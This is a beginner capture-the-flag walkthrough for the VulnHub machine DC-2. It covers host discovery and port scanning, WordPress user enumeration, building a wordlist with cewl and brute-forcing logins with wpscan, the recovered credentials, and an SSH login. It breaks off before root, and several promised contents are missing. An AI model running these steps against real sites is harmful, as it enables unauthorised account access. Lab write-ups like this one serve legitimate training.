In this article we will gain root access to the machine DC-2. This is a CTF challenge for beginners in this field .we can download this machine from vulnhub.
Our very basic step is to identify the target and for that we run the command : netdiscover -i wlan0
Now let's run nmap to check for open ports,and for that we run the command :
nmap -A 192.168.43.148
result shows that there is only 1 open port . So to confirm we run the command.
nmap -p- 192.168.43.148
now this command is showing that one more service is running on port 7744.
So we decided to browse HTTP service by opening our web browser and after typing the IP address 192.168.43.148:80 in our browser it doesn't give any result(an error) so we decided to edit our /etc/hosts file and modify it as .
now again we try to open this website and yes this time it opens. Ok so we have a wordpress website and now we can think to enumerate worpdress website . read this article : https://www.haclabs.org/post/wordpress-penetration-testing to know more about wordpress enumeration.
after enumerating the wordpress website we found that there is no vulnerable theme and no vulnerable plugin that we can exploit so we decided to enumerate users by using the command : ./wpscan --url http://dc-2 --enumerate u
we have found 3 users namely admin,jerry ,tom . So we tried bruteforce attack to find the password but we failed in doing so(if we use any wordlist present in /usr/share/wordlists directory. Now we browse the website again and there we found a page with name flag so click on it, it give us a hint.
So we decided to use a tool cewl , it comes preinstalled in Kali Linux OS. it is a tool which spiders a given url to the specified depth and then return a list of password that can be used in password cracking . So to generate a list of password we run the command : cewl http://dc-2 > passwords.txt
and we save the name of the users that we found in a file with name users.txt
Now we will use these two lists to crack the password by using the command :
./wpscan --url http://dc-2 -U users.txt -P passwords.txt
so we have found two valid combination as :
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
To login into the main panel of wordpress website we visit the page http://dc-2/wp-login.php we logged in successfully by using the credentials of user tom.
But we didn't find anything useful here so we decided to login as jerry.
under page then all page we found two new pages that is flag and flag2
content of page flag is
and content of page 2 is :
we again get a hint that, the port that we have discovered which is 7744 is meant for SSH login because this is another way of taking entry in a system . So we use the credentials of both the user to connect to SSH and we succeed with credentials of user tom.
when we run couple of commands we get an error .